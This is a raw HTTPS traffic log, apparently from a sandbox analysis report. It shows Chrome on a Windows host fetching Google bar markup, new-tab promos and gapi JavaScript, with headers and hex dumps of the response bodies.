                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Version: 705503573
                                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:17 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC372INData Raw: 32 61 32 63 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                                          Data Ascii: 2a2c)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                                          Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                          Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                                          Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                                          Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC1390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 38 33 2c 33 37 30 30 39 34 32 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61
                                                                                                                                                                                                                                                                                          Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700283,3700942,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){va
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC1390INData Raw: 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 47 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 46 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 48 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 49 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72
                                                                                                                                                                                                                                                                                          Data Ascii: c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Gd\u003dfunction(a){return new _.Fd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Hd\u003dglobalThis.trustedTypes;_.Id\u003dclass{constructor
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC1390INData Raw: 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 58 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 57 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 59 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 58 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33
                                                                                                                                                                                                                                                                                          Data Ascii: rn a.i;throw Error(\"F\");};_.Xd\u003dfunction(a){if(Wd.test(a))return a};_.Yd\u003dfunction(a){if(a instanceof _.Id)if(a instanceof _.Id)a\u003da.i;else throw Error(\"F\");else a\u003d_.Xd(a);return a};_.Zd\u003dfunction(a,b\u003ddocument){let c,d;b\u003
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC702INData Raw: 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                          Data Ascii: 3d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC428INData Raw: 31 61 35 0d 0a 77 69 64 74 68 3a 5c 22 77 69 64 74 68 5c 22 7d 3b 5c 6e 5f 2e 6c 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 3b 5f 2e 6f 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 62 5b 31 5d 2c 64 5c 75 30 30 33 64 5f 2e 6d 65 28 61 2c 53 74 72 69 6e 67 28 62 5b 30 5d 29 29 3b 63 5c 75 30 30 32 36 5c 75 30 30 32 36 28 74 79 70 65 6f 66 20 63 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 64 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 63 29 3f 64 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 2e 6a 6f
                                                                                                                                                                                                                                                                                          Data Ascii: 1a5width:\"width\"};\n_.le\u003dfunction(a){return a?a.defaultView:window};_.oe\u003dfunction(a,b){const c\u003db[1],d\u003d_.me(a,String(b[0]));c\u0026\u0026(typeof c\u003d\u003d\u003d\"string\"?d.className\u003dc:Array.isArray(c)?d.className\u003dc.jo


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          10192.168.2.949719142.250.185.684437916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Version: 705503573
                                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:17 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          11192.168.2.949728216.58.206.784437916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:20 UTC729OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: apis.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:20 UTC916INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 117446
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Dec 2024 08:45:49 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 27 Dec 2025 08:45:49 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Mon, 02 Dec 2024 19:15:50 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Age: 281371
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:20 UTC474INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 63 61 2c 64 61 2c 68 61 2c 6d 61 2c 78 61 2c 41 61 2c 42 61 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20
                                                                                                                                                                                                                                                                                          Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:20 UTC1390INData Raw: 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b
                                                                                                                                                                                                                                                                                          Data Ascii: alue;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};
